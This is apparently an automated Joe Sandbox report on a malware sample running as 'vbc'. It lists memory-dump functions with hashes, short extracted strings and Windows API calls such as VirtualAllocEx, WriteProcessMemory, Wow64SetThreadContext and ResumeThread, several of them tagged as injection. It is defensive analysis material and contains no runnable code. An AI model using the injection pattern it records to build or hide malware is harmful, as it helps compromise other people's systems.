Snapshot File: hcaresult_5_2_4310000_vbc.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 6f6e141085191e665c0a8a55a6991278b9a19fae636ca1ee486f592cdef19116
Instruction ID: bfd3ef80cd54412f6d900354ae115d6e1e8535ed43e2369f968db1dafe5e4e37
Opcode Fuzzy Hash: 6f6e141085191e665c0a8a55a6991278b9a19fae636ca1ee486f592cdef19116
Instruction Fuzzy Hash: BB41BBB4D012589FCF04CFA9D984AEEBBB5BB49314F14942AE815B7210D734AA45CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 04316500, Relevance: 1.6, APIs: 1, Instructions: 118
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 043165D3

Memory Dump Source

Source File: 00000005.00000002.2185767774.0000000004310000.00000040.00000001.sdmp, Offset: 04310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4310000_vbc.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 1ca2c50bc8fe784900c9ee04a9fdc6aa0b191f3d928735d9f23a81948d7bf322
Instruction ID: e7359f1fc0b10f97a8b67f41e9515cc84aa3d6c2621168eaa2dc5251c2a1814b
Opcode Fuzzy Hash: 1ca2c50bc8fe784900c9ee04a9fdc6aa0b191f3d928735d9f23a81948d7bf322
Instruction Fuzzy Hash: 4841AAB4D012589FCF04CFE9D984AEEFBB5BB49314F20942AE815B7250D734AA45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 04316658, Relevance: 1.6, APIs: 1, Instructions: 111
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04316712

Memory Dump Source

Source File: 00000005.00000002.2185767774.0000000004310000.00000040.00000001.sdmp, Offset: 04310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4310000_vbc.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 3666a6591697517cab0ddda926823b384697340167e58daaa8f2cbe7ab71a24c
Instruction ID: aa4902809d053b8c59023fdccc4bb776e6c13e62e5fcdb8e50e29bf59782a217
Opcode Fuzzy Hash: 3666a6591697517cab0ddda926823b384697340167e58daaa8f2cbe7ab71a24c
Instruction Fuzzy Hash: 1541B9B8D002589FCF10CFE9D880AEEFBB1BB09314F20A42AE815B7210D734A945CF65

Uniqueness

Uniqueness Score: -1.00%

Function 04316660, Relevance: 1.6, APIs: 1, Instructions: 108
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04316712

Memory Dump Source

Source File: 00000005.00000002.2185767774.0000000004310000.00000040.00000001.sdmp, Offset: 04310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4310000_vbc.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 6599ffa614a8b5ec30e6fe92350a87e68cbd73b11bf0428249a20d1b664aa8bd
Instruction ID: a344106908f5ca94cf87b3559d3ec6543cc47a92e837f68928eb2210a67721be
Opcode Fuzzy Hash: 6599ffa614a8b5ec30e6fe92350a87e68cbd73b11bf0428249a20d1b664aa8bd
Instruction Fuzzy Hash: 8541A7B8D002589FCF10CFE9D880AEEFBB5BB49314F20A42AE815B7200D734A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 043163D1, Relevance: 1.6, APIs: 1, Instructions: 107
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04316482

Memory Dump Source

Source File: 00000005.00000002.2185767774.0000000004310000.00000040.00000001.sdmp, Offset: 04310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4310000_vbc.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 24233862b3f14c4e440a9f82dc753748b3368e413c2046451e9c1b4db34c6ee6
Instruction ID: 545d25d82d80b73678d1c165388d2b948dba4ecf665b2f8f3bc81ec7dc92db8d
Opcode Fuzzy Hash: 24233862b3f14c4e440a9f82dc753748b3368e413c2046451e9c1b4db34c6ee6
Instruction Fuzzy Hash: 8D41B9B8D012589FCF14CFA9D880AEEFBB5BB49314F10A41AE815BB210D734A905CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 043163D8, Relevance: 1.6, APIs: 1, Instructions: 103
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04316482

Memory Dump Source

Source File: 00000005.00000002.2185767774.0000000004310000.00000040.00000001.sdmp, Offset: 04310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4310000_vbc.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: bf7d181ee40ac5c2d2bc596328fd2969f05fd324fd26fdfd9db4c569ee92b711
Instruction ID: 5a6e18292021b75086cdd0203347ce00f5dffea05fadd37a720998ae3b315d76
Opcode Fuzzy Hash: bf7d181ee40ac5c2d2bc596328fd2969f05fd324fd26fdfd9db4c569ee92b711
Instruction Fuzzy Hash: FE4188B8D002589FCF14CFE9D880AEEBBB5BB49314F20A41AE815B7210D735A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 04312861, Relevance: 1.6, APIs: 1, Instructions: 100
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 0431290F

Memory Dump Source

Source File: 00000005.00000002.2185767774.0000000004310000.00000040.00000001.sdmp, Offset: 04310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4310000_vbc.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 39a54b42fd2b66ca7614ffb948fcc43de60f05075d5eed8e5ebbc291d5d7c2fc
Instruction ID: ca32dca889a893f9734e0244ea30c34aff914130f8dbf4878e6711864de753ba
Opcode Fuzzy Hash: 39a54b42fd2b66ca7614ffb948fcc43de60f05075d5eed8e5ebbc291d5d7c2fc
Instruction Fuzzy Hash: B741ABB8D042589FCF14CFA9E884AEEFBB4BB09310F14906AE854B7210D334A955CB65

Uniqueness

Uniqueness Score: -1.00%

Function 04312868, Relevance: 1.6, APIs: 1, Instructions: 96
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 0431290F

Memory Dump Source

Source File: 00000005.00000002.2185767774.0000000004310000.00000040.00000001.sdmp, Offset: 04310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4310000_vbc.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: a20f6bb3a090a21c5a0d97ac38eb121410f97fb6ed39db2c052c74e0d3a92afe
Instruction ID: da45947d1a63a0c2972f6578b0d0eb4cd2ee3f6336f5766a96882be055a58773
Opcode Fuzzy Hash: a20f6bb3a090a21c5a0d97ac38eb121410f97fb6ed39db2c052c74e0d3a92afe
Instruction Fuzzy Hash: 5131ABB8D002589FCF14CFA9E884ADEFBB5BB09310F24941AE814B7310D334A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 043162A8, Relevance: 1.6, APIs: 1, Instructions: 96
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 04316357

Memory Dump Source

Source File: 00000005.00000002.2185767774.0000000004310000.00000040.00000001.sdmp, Offset: 04310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4310000_vbc.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 6ebd519e0b4fef545564d81b41ba410e98f1bdc86b7e97c0b5bcb9ad8bb182fb
Instruction ID: bb3546d937f433f9771c33a36d73765df79953211fc4b3724636e887880e28d8
Opcode Fuzzy Hash: 6ebd519e0b4fef545564d81b41ba410e98f1bdc86b7e97c0b5bcb9ad8bb182fb
Instruction Fuzzy Hash: 5541DAB4D002589FCB14CFE9D884AEEFBB5BF49314F24942AE419B7210D738AA45CF60

Uniqueness

Uniqueness Score: -1.00%

Function 04315552, Relevance: 1.6, APIs: 1, Instructions: 79
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNELBASE(?), ref: 043155D6

Memory Dump Source

Source File: 00000005.00000002.2185767774.0000000004310000.00000040.00000001.sdmp, Offset: 04310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4310000_vbc.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 4c7db94ad18c71e68775c30a0216e05b14bf94b12b7ca49e02b1453f51653992
Instruction ID: a826a0bae4a7f3fe122e93437f2d9b02cbe77140ddf43c8315d370c6e3567c35
Opcode Fuzzy Hash: 4c7db94ad18c71e68775c30a0216e05b14bf94b12b7ca49e02b1453f51653992
Instruction Fuzzy Hash: 2C31CAB8D01258AFCF14CFA9E884AEEFBB5AF49214F14941AE815B7310D734A901CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 04315558, Relevance: 1.6, APIs: 1, Instructions: 75
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNELBASE(?), ref: 043155D6

Memory Dump Source

Source File: 00000005.00000002.2185767774.0000000004310000.00000040.00000001.sdmp, Offset: 04310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4310000_vbc.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 890d98f79de6490874a4d8338227f0d63dd4e0a867f65a0f594117a270eb9878
Instruction ID: 654bf1c9d206c79620e3ef6e236706a3bd8d674fd6476aa7bb6bfa31366c36de
Opcode Fuzzy Hash: 890d98f79de6490874a4d8338227f0d63dd4e0a867f65a0f594117a270eb9878
Instruction Fuzzy Hash: 1031A9B8D012189FCF14CFA9E884AEEFBB5AB49314F14942AE815B7300D735A901CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 002E14D0, Relevance: 1.5, Strings: 1, Instructions: 221COMMON

Download Yara Rule

Strings

@2,m, xrefs: 002E1683

Memory Dump Source

Source File: 00000005.00000002.2184278065.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e0000_vbc.jbxd

Similarity

API ID:
String ID: @2,m
API String ID: 0-2542649492
Opcode ID: 0cdf33803095498c762d81fe053b092fc1aaded0cf7b8e28ebff28ae8c403e05
Instruction ID: 84a354b75b4c0fa1be0076ab3821a2ebf7eaff90355b1f0d968ef032d92db02b
Opcode Fuzzy Hash: 0cdf33803095498c762d81fe053b092fc1aaded0cf7b8e28ebff28ae8c403e05
Instruction Fuzzy Hash: 25A1E074A10258CFDB14CFA9C894BDDBBF5AF89304F5080AAE50AAB360DB349D95DF50

Uniqueness

Uniqueness Score: -1.00%

Function 002EBA07, Relevance: 1.4, Strings: 1, Instructions: 110COMMON

Download Yara Rule

Strings

fCl, xrefs: 002EBA47

Memory Dump Source

Source File: 00000005.00000002.2184278065.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e0000_vbc.jbxd

Similarity

API ID:
String ID: fCl
API String ID: 0-625834680
Opcode ID: aac5fdb61562114bcbb0255a08cede9e75ce67b320ac51d1903a8df8de92b66c
Instruction ID: 65906089392346aa16e11d0e782287592c8934db770638f3676273da5ec1d99b
Opcode Fuzzy Hash: aac5fdb61562114bcbb0255a08cede9e75ce67b320ac51d1903a8df8de92b66c
Instruction Fuzzy Hash: F241F4B4E6425ACFDF21CFA6D8847AEBBB1FF49304F209069D40AA7341EB7448959F41

Uniqueness

Uniqueness Score: -1.00%

Function 002E315E, Relevance: 1.3, Strings: 1, Instructions: 52COMMON

Download Yara Rule

Strings

;, xrefs: 002E322D

Memory Dump Source

Source File: 00000005.00000002.2184278065.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e0000_vbc.jbxd

Similarity

API ID:
String ID: ;
API String ID: 0-1661535913
Opcode ID: a9a99e659281199d53d826f1a81d0f2d59239070d8afdf11fce3615da9dee92f
Instruction ID: 6cb31e9fa8e7336366237d5934d21c6ac6d1c85d1169dcc5d13581f81dccd5a6
Opcode Fuzzy Hash: a9a99e659281199d53d826f1a81d0f2d59239070d8afdf11fce3615da9dee92f
Instruction Fuzzy Hash: 3B21E43595021ADFCB619F60CC88ADDBBB1BF0A300F4181E5E20AA7671EB319A94DF40

Uniqueness

Uniqueness Score: -1.00%

Function 002E3173, Relevance: 1.3, Strings: 1, Instructions: 50COMMON

Download Yara Rule

Strings

;, xrefs: 002E322D

Memory Dump Source

Source File: 00000005.00000002.2184278065.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e0000_vbc.jbxd

Similarity

API ID:
String ID: ;
API String ID: 0-1661535913
Opcode ID: cf40138cca3eb8ab0aeb639ef47a3b35af402afb970974a2f1cae10196972fe8
Instruction ID: 452cf6ee676f9cee258acfd04b97e27a01dcedf9ad85a2f445f613463e34a6c5
Opcode Fuzzy Hash: cf40138cca3eb8ab0aeb639ef47a3b35af402afb970974a2f1cae10196972fe8
Instruction Fuzzy Hash: 1F211A3595021ADFCB219F60CC89ADDBBB1FF09300F4180E5E109A7261DB319A94DF40

Uniqueness

Uniqueness Score: -1.00%

Function 002E251D, Relevance: 1.3, Strings: 1, Instructions: 47COMMON

Download Yara Rule

Strings

, xrefs: 002E25B3

Memory Dump Source

Source File: 00000005.00000002.2184278065.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e0000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 4dccb751e66e7873391df1437606e929bce35e3d1ba6fd832bf455303df78d0a
Instruction ID: 75ed9a27144961fe539bb133b363af788522fae2e6888d545751136a45fa7bf3
Opcode Fuzzy Hash: 4dccb751e66e7873391df1437606e929bce35e3d1ba6fd832bf455303df78d0a
Instruction Fuzzy Hash: 0821A078914269CBDB64DF24DC98BEEBBB1BB4A301F1041E9D50AA32A0DB305E80CF40

Uniqueness

Uniqueness Score: -1.00%

Function 00BD86C2, Relevance: 1.3, Strings: 1, Instructions: 25COMMON

Download Yara Rule

Strings

o )d, xrefs: 00BD8729

Memory Dump Source

Source File: 00000005.00000002.2184945599.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_bd0000_vbc.jbxd

Similarity

API ID:
String ID: o )d
API String ID: 0-1960133635
Opcode ID: b02cbd1cc2303fe4492dd70ff43e60ae8c7398c237fe57fdbee5453499b48fe1
Instruction ID: 52e943a8eb7de89ca310c28af3fe5187ee61dc221b01717c424b22ace4a77a28
Opcode Fuzzy Hash: b02cbd1cc2303fe4492dd70ff43e60ae8c7398c237fe57fdbee5453499b48fe1
Instruction Fuzzy Hash: 1DF0A474E042288FDB54DBA4D9517DABBF6BB58304F1089AAD109BB350EB309A418F61

Uniqueness

Uniqueness Score: -1.00%

Function 002EAAD0, Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2184278065.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e0000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 391b511bfe1c1fc3caf60e19c8da02284505415facd8ca542d05c36e3461952b
Instruction ID: 898358a0ac79ed29b0aed35d3d3264d1b3b79b83e6aed13ede70ac21d433848e
Opcode Fuzzy Hash: 391b511bfe1c1fc3caf60e19c8da02284505415facd8ca542d05c36e3461952b
Instruction Fuzzy Hash: 38B1B374E502498FDB14CFEAC884AEDBBF6BF88314FA48429E505A7354D774AC54CB22

Uniqueness

Uniqueness Score: -1.00%

Function 002E14C0, Relevance: .2, Instructions: 192COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2184278065.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e0000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4a1297270f64ac9b05f512e55188d5b5e9e12c8b78bacde5377d1e8cc54517f
Instruction ID: 5319ab827d2b71ba4ec6adda1323aff7a82bfd358382a1ca3ac59aa4945c505a
Opcode Fuzzy Hash: e4a1297270f64ac9b05f512e55188d5b5e9e12c8b78bacde5377d1e8cc54517f
Instruction Fuzzy Hash: 3381F174A50258CFDB14CFA9C894B9DBBF5BF4A304F5080AAE40AAB360DB349D95DF50

Uniqueness

Uniqueness Score: -1.00%

Function 002EC0E0, Relevance: .2, Instructions: 187COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2184278065.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e0000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: daa366251ecfcabee456a3121f50f92cf7750f192f9718b70c56cfb72199617b
Instruction ID: e1e5400cf14ee9850fc9088b916a00b1a4fafc6aa9d2f04a3ea58d749e83b2f6
Opcode Fuzzy Hash: daa366251ecfcabee456a3121f50f92cf7750f192f9718b70c56cfb72199617b
Instruction Fuzzy Hash: 9E81E474D14258CFCB14DFE9D884AEDBBB2BF89300F60842AE519AB365DB745982CF40

Uniqueness

Uniqueness Score: -1.00%

Function 002EC0D0, Relevance: .2, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2184278065.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e0000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c452dc01d347349e5c6dd01b20a5f329a9d8b59bc176c869ddf77e09d96bb519
Instruction ID: b5e349540742f49e59472eb099e7429050355f724dcf9b91873832c338168797
Opcode Fuzzy Hash: c452dc01d347349e5c6dd01b20a5f329a9d8b59bc176c869ddf77e09d96bb519
Instruction Fuzzy Hash: 8581D474D14258CFCB14DFE9D8946EDBBB2BF8A300F60842AE509AB365DB705986CF40

Uniqueness

Uniqueness Score: -1.00%

Function 002E37E8, Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2184278065.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e0000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8add8957b1a8a9c951f53d7540d471fe92565f4d425e6ae57550330dc9efc603
Instruction ID: dff8be7a1d776762774b70dbd71fe9d1fd8ae7088621cfd2fbd89fac13ee37cc
Opcode Fuzzy Hash: 8add8957b1a8a9c951f53d7540d471fe92565f4d425e6ae57550330dc9efc603
Instruction Fuzzy Hash: D2611F74D55248CFCB00DFA9D948ADDBBF1FF49301F51812AE409BB265EBB09A94CB11

Uniqueness

Uniqueness Score: -1.00%

Function 002EAABF, Relevance: .2, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2184278065.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e0000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36fa94a70769973d62c54ef5b21e2404d112e9a419ebed02d60444a564181844
Instruction ID: 0e8f0dd8593d9ba20b7212fdd2ef3926c736da76fb43ce2a02f893fe626b80c0
Opcode Fuzzy Hash: 36fa94a70769973d62c54ef5b21e2404d112e9a419ebed02d60444a564181844
Instruction Fuzzy Hash: AE515874E60288CFDB04CFA6C8847EEBBF5AF89314F948429E405AB351D7B468558F62

Uniqueness

Uniqueness Score: -1.00%

Function 002E3B7F, Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2184278065.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e0000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ddb356eb24e4954d17cc6f2f516c59a1c01d1d488fedf2a09766773a3c52491
Instruction ID: 797413bfc184c665e74b73a6d271a1fdd6a21ddc67f5d3e7fd13e4d0a27b752f
Opcode Fuzzy Hash: 9ddb356eb24e4954d17cc6f2f516c59a1c01d1d488fedf2a09766773a3c52491
Instruction Fuzzy Hash: 53613474D54258CFDB50CFA9C848BDDBBF2BF49301F5091AAE409AB261EB709A95CF10

Uniqueness

Uniqueness Score: -1.00%

Function 002E37D8, Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2184278065.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e0000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3de6be4ef03b7081d9d71b48c124cff4e5edf5f6c6991b71fe17c91835a48b1c
Instruction ID: 148fac36e3bbffbb1fff1cf3879bc4b24325ca7d7c8e538388a4bcaf22cef14d
Opcode Fuzzy Hash: 3de6be4ef03b7081d9d71b48c124cff4e5edf5f6c6991b71fe17c91835a48b1c
Instruction Fuzzy Hash: F1512374D55288CFCB00DFA8D948AEDBBB1FF4A301F51816AE405BB261E7749A94CF41

Uniqueness

Uniqueness Score: -1.00%

Function 002E3F58, Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2184278065.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e0000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1cd9e5c110d45395d771575448e9302fbe9be4cab76dfd00a412c2238eb0c62
Instruction ID: 2cc5ccf2b9ff6b3519c023ecee04b359bd97fa591d40da8b21d8deae32288cc8
Opcode Fuzzy Hash: f1cd9e5c110d45395d771575448e9302fbe9be4cab76dfd00a412c2238eb0c62
Instruction Fuzzy Hash: 28418874D60209CFCB04DFA6E448AEEBBF5EF89301F508029E515B3260D7B84A91CF51

Uniqueness

Uniqueness Score: -1.00%

Function 002E3F48, Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2184278065.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e0000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e845d2d9ba1087adfaf506365dd28cc34b8e342f5e7b8bfcdb4a2b4585bf6360
Instruction ID: b0569da3ae76c49647bb82c677f76e2e104abbb17badb2e38b92dd514d1b9d7a
Opcode Fuzzy Hash: e845d2d9ba1087adfaf506365dd28cc34b8e342f5e7b8bfcdb4a2b4585bf6360
Instruction Fuzzy Hash: EE41D934D54248CFCB04DFAAE488AEDBBF5EF8A301F548429E511B3260D7784A92CF51

Uniqueness

Uniqueness Score: -1.00%

Function 002E0B08, Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2184278065.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e0000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88d2addade4c8c23b47b755e96f47dc5e5b5bdd2e1b63f8d9f68825319e6adc0
Instruction ID: 4fa3e9e27ed6b82f6adacdc1ef80d9911d78febcf7f86e9cf200eccebeadbf0e
Opcode Fuzzy Hash: 88d2addade4c8c23b47b755e96f47dc5e5b5bdd2e1b63f8d9f68825319e6adc0
Instruction Fuzzy Hash: FE313B74D51249CBDB00DFA6D4C47EEBBF6BF89309FA05429E005B7250DBB49992CB50

Uniqueness

Uniqueness Score: -1.00%

Function 002E0AF8, Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2184278065.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e0000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a1a2ed7ad9c918052d9badbb37892b352317b8151349101e3b63acc2ca8dd08
Instruction ID: e50c0b69c78f4798a121d6b8dc07b2f1096cfb38eaf9ac01dc52c71dbf77d9cd
Opcode Fuzzy Hash: 4a1a2ed7ad9c918052d9badbb37892b352317b8151349101e3b63acc2ca8dd08
Instruction Fuzzy Hash: E6316934D512898FDB00CFB5D888BEEBBB1BF4A308F504429D005B7250DBB48996CF50

Uniqueness

Uniqueness Score: -1.00%

Function 002EBED1, Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2184278065.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e0000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76073b56ef38f7625ef96d9778711eee1f66868298f9e5a0c45600346999b763
Instruction ID: 33a2c085f5f6325e2a94f70334359d20164c4136af558f21fbb5edc7de522af9
Opcode Fuzzy Hash: 76073b56ef38f7625ef96d9778711eee1f66868298f9e5a0c45600346999b763
Instruction Fuzzy Hash: DB318974D65259DFCB01DFA9D844AEEBBB1EF4A300F504429F805B3661C3744955CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 002E1968, Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2184278065.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e0000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a237fd9bd2bf36ae714d12cbd280daea88f25a676a95df6169c0619ee6662025
Instruction ID: c0443cf0cf5d0eec5781c1b64d40455c84e3dd252e360cdd1c0c2de20e38bdf8
Opcode Fuzzy Hash: a237fd9bd2bf36ae714d12cbd280daea88f25a676a95df6169c0619ee6662025
Instruction Fuzzy Hash: 86316870D66259DFCB04DFA9D4486EEBBB5BF49301F604039E406B3351D7B04AA4CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 002EBEE0, Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2184278065.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e0000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c998273001049d20d1ffcf75a732d249619e709262b5c6497cf1c388a3602a01
Instruction ID: f197821fbc840cbefa297b15c65aaeefb8c1326080d0cdd4e2f5aa0bf768f242
Opcode Fuzzy Hash: c998273001049d20d1ffcf75a732d249619e709262b5c6497cf1c388a3602a01
Instruction Fuzzy Hash: 3A316374DA5209DFCB01DFA6D848AEFBBB1EF4A300F508029E905B3650C7B44A61CF90

Uniqueness

Uniqueness Score: -1.00%

Function 002E1959, Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2184278065.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e0000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b267fcc6bfcaf54d7cdbdb93a984859c97e731b0236ae30cf44b3969d2f466df
Instruction ID: f46b8f7a0a3aca01f330982e0ec5c257f55c08d7bd913d5bcf610bfa573326d7
Opcode Fuzzy Hash: b267fcc6bfcaf54d7cdbdb93a984859c97e731b0236ae30cf44b3969d2f466df
Instruction Fuzzy Hash: 49318D70D66289DFCB04DFB9D8586FEBBB5AF4A301F104439E005A7361D7B04964CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00BD9720, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2184945599.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_bd0000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91b24baae5b49e5da15560bec934a41c2b74d14df2f3b6cc6702a5180b6f3d52
Instruction ID: ff9343efebdbf563e5daab5d50491e02554763be339f384aef0958fe4d076211
Opcode Fuzzy Hash: 91b24baae5b49e5da15560bec934a41c2b74d14df2f3b6cc6702a5180b6f3d52
